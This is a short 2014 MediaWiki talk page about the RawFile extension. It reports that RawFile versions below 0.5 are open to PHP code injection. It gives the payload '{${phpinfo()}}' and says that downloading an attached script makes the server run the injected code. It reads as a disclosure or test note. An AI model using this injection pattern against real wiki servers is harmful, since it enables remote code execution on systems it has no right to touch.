Talk:Mediawiki RawFile

From YobiWiki
Revision as of 16:03, 13 February 2014 by <bdi>Fuujuhi</bdi> (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Testing PHP code injection on Rawfile < 0.5 :
Adding this code to a wikipage: 

<nowiki>{${phpinfo()}}</nowiki>
[{{#file: myscript.sh}} as myscript.sh]
<source lang=bash>
#!/bin/bash

echo 'Hello world!'
exit 0
</source>

and trying to download myscript.sh will execute phpinfo() on the server.

Retrieved from "https://wiki.yobi.be/index.php?title=Talk:Mediawiki_RawFile&oldid=8555"